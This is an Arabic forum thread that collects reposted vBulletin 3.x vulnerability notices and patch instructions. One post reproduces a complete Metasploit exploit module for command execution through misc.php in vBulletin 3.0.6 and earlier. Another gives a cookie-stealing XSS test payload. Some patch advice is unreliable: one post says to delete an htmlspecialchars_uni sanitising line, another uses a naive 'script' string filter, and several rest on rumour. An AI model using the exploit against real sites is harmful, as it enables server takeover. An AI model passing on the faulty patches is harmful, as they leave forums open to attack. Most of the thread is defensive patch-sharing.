| |||||||
| المدوّنات | البحث | مشاركات اليوم | اجعل كافة المشاركات مقروءة |
 |
| | LinkBack | أدوات الموضوع |
| |||||
| جـمـيــــــــــــع ثــقـــــرات الجيل الثالث vb منقول  -------------------------------------------------------------------------------- السلام عليكم و رحمة الله تلقيت رسالة من شركة جيل سوفت تفيد عن وجود ثغرة من نوع (cross site scripting) و هي موجودة في 3.0.3 - 3.0.10 لترقيع الثغرة عليك استبدال ملف functions_file.php الموجود في مجلد includes بالملف الموجود في المرفقات رابط الموضوع الأساسي http://www.vbulletin.com/forum/showthread.php?t=166389 | |||||
|
| |||||
| منقوووووووووووووووول الأمس الشركة الأم vbulletin أصدرت نسختين جديدتين وهما vb3.5.2 و vb3.0.11 وذلك لإضافة بعض المميزات وترقيع الثغرات وأصدرت باتش لمن لا يريد الترقية لإغلاق الثغرات. لأصحاب النسخ vb3.5.1 إضغط هنا لأصحاب النسخ vb3.0.10 إضغط هنا باسوورد فك الضغط::- www.dev4arab.net ================ طريقة التركيب :: فك الضغط عن الملفات ستجد مجلد 351_patch و 3010_patch بداخلهم مجلد includes إرفع بال Ftp وإستبدل الملفات . يمكنك تحميل الملفات من المرفقات بنفس باسوورد فك الضغط http://www.traidnt.net/vb/attachment...0&d=1133984643 http://www.traidnt.net/vb/attachment...1&d=1133984643 | |||||
|
| |||||
| منقوووووووووووووووووووووووووول ثغره] من لوحة تحكم المنتدى الكوكيز -------------------------------------------------------------------------------- أخواني تضرر موقعي من أحدى الهكر الذين يلعبون في المواقع وقد علمني ما هي الثغرات التي تكون موجوده وغالبا في أوامر معينه أخواني حل للثغره تذهب لخيارات المنتدى  وبعدها خيارات مرقبه الكلمات الممنوعه http://www.9wrh.com/get.php?filename=1131038056.gif تضف كلمه (( كوكي )) وبعد ذلك حفظ http://www.9wrh.com/get.php?filename=1131038109.gif وهذه طريقه سد الثغره الأولى اما الطريقه الثانية وهي ان تحظ من تحكم المرفقات صيغه psd وشرح الطريقه هي 1- من لوحة تحكم المنتدى تذهب إلى . التحكم بالملفات المرفقه 2- تختار الامتدادات والحجم 3- تقوم بحذف صيغه psd وهي الطريقه الثانية لسد الثغره الاخرى وان شاء الله وفقت بالشرح معكم ودمتم بكل ود | |||||
|
| |||||
| منقوووووووووووووووووووووووووووووووووووول [ ثغره] Path Disclosure في نسخ vBulletin 3.5.0 -------------------------------------------------------------------------------- السلام عليكم ورحمة الله وبركاته بدأت منذ أسبوع فتح ملفات نسخة vBulletin 3.5.0 العجيبه والتي تسعى مجموعة jelsoft أن تجعلها نسخ ثابته في الأشهر القادمه ووصلت بتطويرها حتى الان الى إصداره أسمتها Candidate 3 وهذا يعني أن النسخه ثبتت بعد إصدارات البيتا التي طرحتها منذ فتره وعلى مايبدوا أنها ستطلق النسخه الرسميه الثابته على بداية العام الجديد 2006م وأرى أن بعض الأخوان هنا بسوالف تسرع بتركيب هذه النسخه والتي لا يعلم أحد عنها سوى خاصية الـ plugins و الـ ajax . قمت بالبحث عن الثغرات في هذه النسخه وهذا أول الخير بإذن الله ثغره من نوع Path Disclosure ومستواها متوسط وعن طريقها يستطيع المخترق معرفة دليل الموقع موجود بأي مكان على الخادم الثغره موجوده في ملف class_core.php وبالتحديد في سطر رقم 1365 foreach ($this->superglobal_lookup AS $arrayname) { $registry->superglobal_size["$arrayname"] = sizeof($GLOBALS["$arrayname"]); foreach (array_keys($GLOBALS["$arrayname"]) AS $varname) { unset($GLOBALS["$varname"]); <<------ الترقيع: 1- افتح ملف class_core.php وابحث عن السطر التالي : unset($GLOBALS["$varname"]); 2- إستبدله بالأتي: if( !in_array($varname, $this->superglobal_lookup )) unset($GLOBALS["$varname"]); 3- إحفظ الملف وقم برفعه. تحياتي لكم | |||||
|
| |||||
| منقوووووووووووووووووووووووووووووووووول  ثغرة التصريح 777 -------------------------------------------------------------------------------- السلام عليكم ورحمة الله وبركاته أخواني الأعضاء فيمعهد ترايدنت لاحظت أن الأغلبيه يستخدم سكربتات لرفع الملفات في موقعه وهذه السكربتات كثيره منها ماهو أمن ومنها ماهو غير أمن ، وهذه السكربتات تشترط منك ياصاحب الموقع أن تقوم بعمل تصريح 777 او تصريح 707 لمجلد معين وهذه التصاريح تسمح لزوار موقعك بالكتابه في المجلد الذي قمت أنت بتصريحه. الخطوره هنا من ملفات الـ php لأنها تحتوي على تعليمات برمجيه يتم تنفيذها داخل خادم الموقع . فلو قام أحد الأطفال المخترقين من رفع ملف php إلى الخادم بأي ثغرة كانت فسوف يبحث عن المجلدات ذات تصريح 777 أو 707 لأن صلاحياته صلاحيات زائر وحين يجد هذه المجلدات فسوف يستخدمها كمعسكر لملفاته وسكربتاته مثل : PHPShell ، MySQLInterface ............. الخ بعدها سيصل إلى ملفات موقعك وبعدها أنت تعلم ماذا سيفعل إذن ما الحل الصحيح لهذه المجلدات !؟!؟ الحل طبعاً بتعطيل تنفيذ الـ php داخل هذه المجلدات عن طريق تعليمه تضيفها في ملف الـ .htaccess وهي : php_flag engine off بعدها تقوم برفع ملف الـ .htaccess الى كل المجلدات ذات تصريح 777 . وللتجربه قم برفع اي سكربت php للمجلدات ذات التصاريح 777 والتي تحتوي على الـ htaccess وقم بالدخول على هذا السكربت وشاهد النتيجه . سوف تجد أن السكربت لم يقم الخادم بتنفيذه ملف .htaccess مرفق طبعا مدري لو كان الموضوع موجود من قبل | |||||
|
| |||||
| منقووووووووووووووووووول [ ثغره] ملف التعليمات faq.php -------------------------------------------------------------------------------- للإصدارة ما قبل الإصدار الأخير vb3.0.7 3- ثغرة ملف التعليمات faq.php و طريقة سد هذه الثغرة؟ افتح ملف التعليمات faq.php الموجود في مجلد منتداك الرئيسي و ابحث عن الكود: // initialize some template bits $faqbits = ''; $faqlinks = ''; أضف بعده الكود: $navbits[''] =$vbphrase['faq']; ثم احفظ الملف | |||||
|
| |||||
| منقووووووووووووووول [ثغره] في ملف editpost.php -------------------------------------------------------------------------------- للإصدارة ما قبل الإصدار الأخير vb3.0.7 4- ثغرة ملف تعديل المشاركة editpost.php و طريقة سد هذه الثغرة؟ افتح الملف editpost.php الموجود في مجلد منتداك الرئيسي و ابحث عن الكود: $edit['title'] = trim($_POST['title']); و استبدله بالكود التالي: $edit['title'] = trim(xss_clean($_POST['title'])); و في نفس الملف قم بوضع هذا الكود بعد الكلمة <?php و تجدها في أول الملف و هذا هو الكود: $title = addslashes($title); if (strstr($title,"script") != NULL){ echo "Warning..Are you hacker?<br>vBulletin<br>note: use scr!pt"; exit; } تحياتي  | |||||
|
| |||||
| منقووووووووووووووووووول [ثغره] خطيرة بالنسخة 3.0.9 تسمح بالاختراق -------------------------------------------------------------------------------- الإقتباس المشاركة الأصلية كتبت بواسطة الامراء مساء الخير للجميع وكل عام ونتم بخير وصحه وعافيه مبارك عليكم الشهر وتقبل الله صيامكم وقيامكم اخوتي الكرام اسعد الله ايامكم بالافراح والمسرات لقد اكتشفت في النسخ الاخير 3.0.9 للمنتديات الفي بي ثغرة تسمح بالاختراق وتم اكتشافها وهي عى النحو التالي : 1- يتم تسجيل العضو بالمنتدى وبعدها يتم تغيير لقبة الي مثلا ( المدير العام او المشرف العام ) ومن الغريب انه توجد لدية صلاحيات المدير العام او المشرف العام 2- اثناء تتبعي للعضو اثناء دخوله المنتدى وتغيير لقبة دون ان اقوم بتفعيل اشتراكه بالمنتدى اصلا وجدة قد دخل عن طريق ملف user اي معناها ان الثغرة موجودة بهذا الملف والسبب ان هذا العضو دخل المنتدى 5 مرات عن طريق هذا الملف وباسماء مختلفه وايبي مختلف وايميل مختلف طبعا ؟ مع العلم انني مغلق جميع الثغرات ومسوي جدار ناري للمجلدات الحساسه بالمنتدى واهمها لوحه تحكم المشرف العام كيفيه ترقيع الثغرة لاحد يسالني لاني طرحت الموضوع حتى يتم النقاش فيه وايجاد الحل المناسب لهذه الثغرة نرجو من لديه خلفيه عن هذه الثغره وكيفيه اغلاقها بان لايبخل علينا بالمساعدة في التخلص منها بندر العنزي  | |||||
|
| |||||
| منقووووووووووووووووووووول [ثغرة] في ملف authorize.php -------------------------------------------------------------------------------- السلام عليكم ورحمة الله وبركاته ثغرة ملف authorize.php للبيع و الشراء و طريقة ترقيعها هذا الملف هو ملف بيع و شراء مثل paypal و الطريقة طبعا هي حذفه نهائيا و لا توجد طريقة غيرها للآن و طبعا قم بحذفه لأنه لا يفيدك و هو موجود داخل مجلد subscriptions الموجود داخل مجلد منتداك الرئيسي و لكن إذا كنت ممن يودون استخدامه فتفضل الحل : افتح الملف و ابحث عن الكود : $userid = $DB_site->query_first("SELECT userid, languageid, styleid FROM " . TABLE_PREFIX . "user WHERE userid = " . $item_number[1]); و استبدله بالكود التالي : $userid = $DB_site->query_first("SELECT userid, languageid, styleid FROM " . TABLE_PREFIX . "user WHERE userid = " .intval( $item_number[1])); و السلام عليكم و رحمة الله و بركاتة لا تنسونا من الدعاء الصالح النمر ,, | |||||
|
| |||||
| منقوووووووووووووول [ثغرة] مركز تحميل الصور + سد الثغره -------------------------------------------------------------------------------- بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته الى كل من لديه مركز 1 - تحميل الصور 2 - تحميل الملفات 3 - تحميل الأفلام <-------- هذا ما اعتبره ضروري ان هناك سكربتات كثير يوجد بها ثغراة تسمح للمخترقين بالتسلل الى السيرفر وبأمكانهم رفع الشل shll و أخذ نسخه احتياطيه لأي سكربت كالمنتدى او المجله .... الخ ================ فأتمنى من الجميع ان يضعو هذا الهاك الذي ارفقته بداخل مجلد الصور او الملفات حتى لا يستطيع احد اختراقه =============== ان برمجته سهله اضفت به الداله RemoveType حتى لاتعمل فايلات الهكر او الكراك وهي تنفع لمستخدمي سيرفر ليونكس اما عن wap serv فهي على الأرجح لا تعمل وهو عباره عن جدار حمايه لفايلات المصرحه chmod 777 اتمنى من الجميع ذكر المصدر والدعاء الصالح ودمتم بخير فتى الأمارات المرفق يرجى تحميله من هنا | |||||
|
| |||||
|
منقووووووووووووووووووووووول [ثغره] بملف الـ misc.php -------------------------------------------------------------------------------- السلام عليكم يا أعضاء ترايدنت ثغره تمكنك من رفع شل على الموقع وللترقيع الترقيه الي اخر اصدار او الي قبله مكتشف الثغره str0ke تاريخ: 2005-08-03 كود: ## # Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit # Name: php_vb3_0_6.pm # License: Artistic/BSD/GPL # Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good. # # # - This is an exploit module for the Metasploit Framework, please see # http://metasploit.com/projects/Framework for more information. ## package Msf::Exploit:  hp_vb3_0_6;use base "Msf::Exploit"; use strict; use Pex::Text; use bytes; my $advanced = { }; my $info = { 'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit', 'Version' => '$Revision: 1.0 $', 'Authors' => [ 'str0ke' ], 'Arch' => [ ], 'OS' => [ ], 'Priv' => 0, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 80], 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], 'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'], 'SSL' => [0, 'BOOL', 'Use SSL'], }, 'Description' => Pex::Text::Freeform(qq{ This module exploits a code execution flaw in vBulletin <= 3.0.6. }), 'Refs' => [ ['MIL', '832'], ], 'Payload' => { 'Space' => 512, 'Keys' => ['cmd', 'cmd_bash'], }, 'Keys' => ['vBulletin'], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $vhost = $self->GetVar('VHOST') || $target_host; my $path = $self->GetVar('RPATH'); my $cmd = $self->GetVar('EncodedPayload')->RawPayload; # Encode the command as a set of chr() function calls my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd)); # Create the get request data my $data = "?do=page&template={\${passthru($byte)}}"; my $req = "GET $path$data HTTP/1.1\r\n". "Host: $vhost:$target_port\r\n". "Content-Type: application/html\r\n". "Content-Length: ". length($data)."\r\n". "Connection: Close\r\n". "\r\n"; my $s = Msf::Socket::Tcp->new( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ($s->IsError){ $self->PrintLine('[*] Error creating socket: ' . $s->GetError); return; } $self->PrintLine("[*] Sending the malicious vBulletin Get request..."); $s->Send($req); my $results = $s->Recv(-1, 20); $s->Close(); return; } 1; وللتوضيح اكثر الثغره في ملف misc.php المصدر: http://www.milw0rm.com/id.php?id=1133 | |||||
|
| |||||
|
منقووووووووووووووووووول السلام عليكم الصراحة لقيت مواقع كثيرة تعاني من ها الثغرة المكتشف : العندليب قم بفتح ملف العشره مواضيع باسم (last10config.php) او (configlast.php) الترقيع سهل ابحث عن كلمة وامسحها $fsel وكذلك كلمة $ftitle انسخ الكلمه والصقها في البحث | |||||
|
| |||||
| منقووووووووووووووووووووول ثغره] بملف includes/functions_faq.php -------------------------------------------------------------------------------- السلام عليكم ورحمة الله وبركاته تم اكتشاف ثغرة في جميع اصدارات المنتديات حتى الاصدار السابع والثغرة معروضة في منتدى شركة فبلتن كان في ثغرة قديمة في نفس الملف لكن الان تم اكتشاف ثغرة أخطر منها تاريخ اكتشاف الثغرة 2005 1426/5/12 والثغرة في ملف includes/functions_faq.php طريقة اغلاق الثغرة : ضع الملف المرفق بالمرفقات بدلا من الملف القديم ومنتداك راح يكون سليم ان شاء الله لن أشرح طريقة استغلال الثغرة الان لأن منتدانا الغالي مصاب بالثغرة وجميع المنتديات بعد اغلاق الثغرة سأشرح طريقة استغلالها أرجوا تثبيت الموضوع لأنه خلال أسبوع سأشرح طريقة استغلال الثغرة في الموضوع نفسه سأضعه في رد (بالصور) تحياتي : sos_vb (منقووووووووووووووووووووووووووووووووووووووول | |||||
|
| |||||
| منقووووووووووووووووووووووول [ثغره] بملف الرسائل الخاصه private.php ثغرة في الرسائل الخاصة الاصدارات المصابة vb من 3.0 الى 3.0.7 جربت على جميع الاصدرات ونجحت الثغرة المهم ترقيع الثغرة 1- تغيير بملف private.php ابحث عن $pm['title'] = trim($pm['title']); استبدله بـ $pm['title'] = trim(xss_clean($pm['title'])); =============================== تركي الودعاني المصدر ووصلتني ثغره يوم امس واضنها جديده علي وربما تكون قديمه لدى البعض منكم واشكر الاخ الفاضل jihad حيث نبهني بوجود ثغره في المعهد وتم حذفها يوم امس ومن هنا ارجو ممن يملكون النسخه الثالثه سواء مرخصه او منزوعه كود التبليغ البحث في ملف private.php عن $pm['title'] = htmlspecialchars_uni($pm['title']); قم بحذفها فقط | |||||
|
| |||||
| منقووووووووووووووووول [ثغره] ببعض الملفات بجميع النسخ من 3.0.3 الى 3.0.7 -------------------------------------------------------------------------------- السلام عليكم ورحمة الله وبركاته ،، هذا الموضوع مأخوذ من بعض المواقع والمنتديات . ( مهم ) للمعلومية تحياتي أخوكم الصم 5/ شرح أخي oman4hosting : لقد تم اكتشاف ثغرة خطيرة فى منتديات vb3 ثغرة الرسائل الخاصة الاصدارت المصابة هى 3.03, 3.0.4 ,3.0.5 3.0.6,3.0.7 للتأكد من وجود الثغرة اتبع الاتي: قم بكتابة رسالة جديدة و ضع اسم المستلم و العنوان و في المضمون ضع الكود التالي: <Script>javascript:alert(document.cookie);</Script> و اعمل مشاهدة و شووف اللي يظهر لك,, ترقيع الثغرة: ترقيع الثغرة 1- تغيير بملف private.php ابحث عن $pm['title'] = trim($pm['title']); استبدلها بى $pm['title'] = trim(xss_clean($pm['title'])); تحية طيبة,, المصدر ميعادي ,, +++++++++++++++++++++++ 6/ شرح أخي المتميز : بسم الله الرحمن الرحيم .. الصلاة والسلام على نبينا محمد و على اله و صحبه اجمعين .. اللهم لاعلم الا ماعلمتنا ... اما بعد .. و طبعا الاصدار 3.0.7 ياشباب تم اكتشاف ترقيع لها و تم اكتشاف الثغرة من قبل موقع سكيروتي ; هذاي الثغرة التي يستخدمها اكبر عدد من الهكر ; والثغرة الاولى functions_search وهذاي ثغرة ماهي قويه كثير ; والحل لها انك تنزل الملف اللي انا حاطه بالمرفقات ; تم اكتشاف الترقيع من قبل فريق S@udi virus تم الانتهاء من هذاي الثغرة والحمد لله ; --- نجي لثغرة خطيره جدا جدا جدا ; بالنسبه لي misc.php = هذي الثغرة تقوم بأرسال اوامر اللينكس يعني كأنك رافع لك شل !! يعني توفر عليك و طبعا الهكر مابقو شيء مااكتشفوه اكتشفو حتى كيف تخطى السيف مود ; لا اله الا الله عليهم !!  وهذي الثغرة خطيره ; والترقيع بالمرفقات الملفات المرفقة : http://www.swalif.net/softs/attachme...chmentid=18491 | |||||
|
| |||||
| منقووووووووووووووول [ثغره] بملف showgroups.php + ملف online.php -------------------------------------------------------------------------------- السلالالالالالالالالالالالالالالام عليكم في ثغرة خطيرة جداً بمعنى الكلمة .. ثغرة المتواجدون الآن + عرض المشرفين هذي ثغرة يديدة لكن مب معروفة عند الجميع والمشكلة انه مب معروفة في اي نسخه موجودة لكن اعتقد 3.1 وفوق يعني الكل يستغلها بالإختراق وما يخبرون حد وعلماً بهذي الثغرات يقدر المخترق يخترق سيرفر المنتدى (( المستضيف )) بالكاااااامل على حسب مهارته في الإختراق .. فـ نصيييييييييييحه مني للجميع حذف الملفاة من الاف تي بي للتأمين .. 1_ vb/online 2_ vb/showgroups ونقدر نقول وجودهن كـ عدمهن هذي نصيحه موجهة مني للجميع والقرار لكم وحبيت اني انصحكم . يمكن اتكون إشاعة لكن أخذ الحذر مهم تقبلوا مني فائق الود والأحترام ذيــ الــ ع ــين ــب | |||||
|
| |||||
| منقووووووووووووووووووووووووول [ثغره] بملف config.php تختص بالكوكيز -------------------------------------------------------------------------------- السلام عليكم اشحالكم اخواني اعضاء منتدى ترايد نت عساكم بخير في ثغره جديده وهي مالت الكوكيز الفايده من ها الشغله انك تقدر تحمي منتداك من سرقه الكوكيز ويعدل لك في الكوكيز واحسب ماسمعت ان حتى لو احد طالع ال hash مايقدر يستغله في تعدليل الكوكيز والدخول بحساب الادمن ________________ طريقه سد الثغره افتح ملف الكونفيق الي في منتداك // Prefix that all vBulletin cookies will have // For example $cookieprefix = 'bb'; غير الحرف bb الى اي حروف تبيها المهم غير bb _________ وانتهى الموضوع دمتم سالمين ________ أمير العاشقين _______ يرجى ذكر المصدر عند النقل .. سلمتم | |||||
|
| |||||
| منقووووووووووووووول [ثغره] بملف functions_search.php -------------------------------------------------------------------------------- بسم الله الرحمن الرحيم مكتشف الثغره : Kier (فريق فى بلتين التطويرى) تاريخ الاكتشاف : 12/3/2005 نوع الثغره : Xss الملف المصاب :functions_search.php درجه الخطوره : منخفضة الاصدارات المصابه :vBulletin 3.0.7 وما قبلها قام فريق vBulletin باكتشاف ثغره جديده من نوع Xss فعاله على كل الاصدارات الحاليه من vBulletin و الثغره من نوع Xss ( تقريبا مالها فايده على الجيل الثالث) لكى يكون المنتدى قابل للاختراق بها لابد ان يكون الحد الادنى للبحث فى المنتدى 10 حروف (وهذا سبب من اسباب انخفاض خطورتها) الاستثمار : غير متوافر حتى الان الترقيع : اما تنشيط خاصيه Search Wild Cards او تقليل الحد الادنى للحروف فى البحث من المسار التالى فى لوحه التحكم vBulletin Options >>> Message Searching Options >>> Default Search او بتغيير الملف المصاب الموجود على المسار التالى فى مجلد المنتدى includes/functions_search.php تقوم بتغييره بالملف هذا http://www.swalif.net/softs/attachme...chmentid=17219 اتمنى الفائدة والدعاء --<<منقول.. | |||||
|
| |||||
| منقووووووووووووووول ثغره] بملف vBulletin 3.0.X init.php SQL Injection -------------------------------------------------------------------------------- السلام عليكم ورحمة الله وبركاته تم اكتشاف ثغره جديد في منتديات vb الجيل الثالث من قبل الاخ عندل والثغره موجوده في ملف init.php وتحديداً في سطر 542 وهي ثغرة SQL Injection ويتم نجاح هذه الثغره إذا كانت خاصية magic_quotes_gpc معطله OFF داخل الـ PHP . التـــرقـــيـــع : توجد طريقتين الأولى : إضافة السطر التالي في ملف .htaccess php_value magic_quotes_gpc 1 الثاني/ بتعديل ملف init.php . قم بالبحث عن $datastoretemp = $DB_site->query(" SELECT title, data FROM " . TABLE_PREFIX . "datastore WHERE title IN ('" . implode("', '", $specialtemplates) . "') "); unset($specials, $specialtemplates); واستبداله بالتالي if(!is_array($specialtemplates)) exit; $specialtemplate = array(); foreach ($specialtemplates AS $arrykey => $arryval) { $specialtemplate[] = addslashes($specialtemplates["$arrykey"]); } $datastoretemp = $DB_site->query(" SELECT title, data FROM " . TABLE_PREFIX . "datastore WHERE title IN ('" . implode("', '", $specialtemplate) . "') "); unset($specials, $specialtemplates, $specialtemplate); | |||||
|
| |||||
| منقوووووووووووووووووووووووول [ثغره] غير خطره في برنامج الاهداءات -------------------------------------------------------------------------------- السلام عليكم ورحمة الله وصلني خبر بـ ان يوجد ثغرة في برنامج الاهداءات للاخ أبو عمـار وهي من تجربتيـ ليس خطيرة كود :: ويمكنك حذف الاهداءات القديمه واضافه أهداءات وأشياء مماثله :: مسار الثغرة: http://www.Domins.com/arabic/ehdaa/admin/admin_show.php الترقيع: فقط اعمل Edit تعديل ع ملف Admin_Show.php بإن اذا يوجد ادمن مستخدمـ في البرنامج خلي الي يدش على هل ملف يطلب منهـ الUser | Pass والتعديل سهل طبعناٌ بنسبه لـ للي لهم خبره في الـPhp وعمـل جدار ناري من الـسي بنل الموقع على مجلد Admin | |||||
|
| |||||
| اقتباس:
والله إنك ما قلت إلا الواقع 100% .. الله عليك ..
__________________ ██████████ ██████████ ██████████ مهارات سوفت مهارات سوفت للبرامج وتطوير المواقع والمنتديات والتبادل التجاري. للتواصل .. 00967733873335 باب الحارة .. للبيع ..!! | |||||
|
| |||||
| اقتباس:
اول شي يعطيك العافيه على المشاركه ثاني شي كلمتك نسخ و لصق أنا لقيته فيه موقع وخذتهم واللي فيه مذكور المصدر ماشلته واللى مافيه مو مني من اللى كاتب الموضوع الاصلي على فكره انا يوم نقلت المواضيع كتبت اول الموضوع منقول بس يمكن انت تحب تشوف اللي يعجبك واللي مايعجبك ماتحب تشوفه وعلى فكره اكثر اللي نقلتهم مذكور المصدر بس انت تحب دور السوالف اي والله الله كريم وكل واحد على نيته  واذا الدعاء منك انا مابيــــــــه تحياتي للجميع | |||||
|
|
| |
| |
| أدوات الموضوع | |
| |
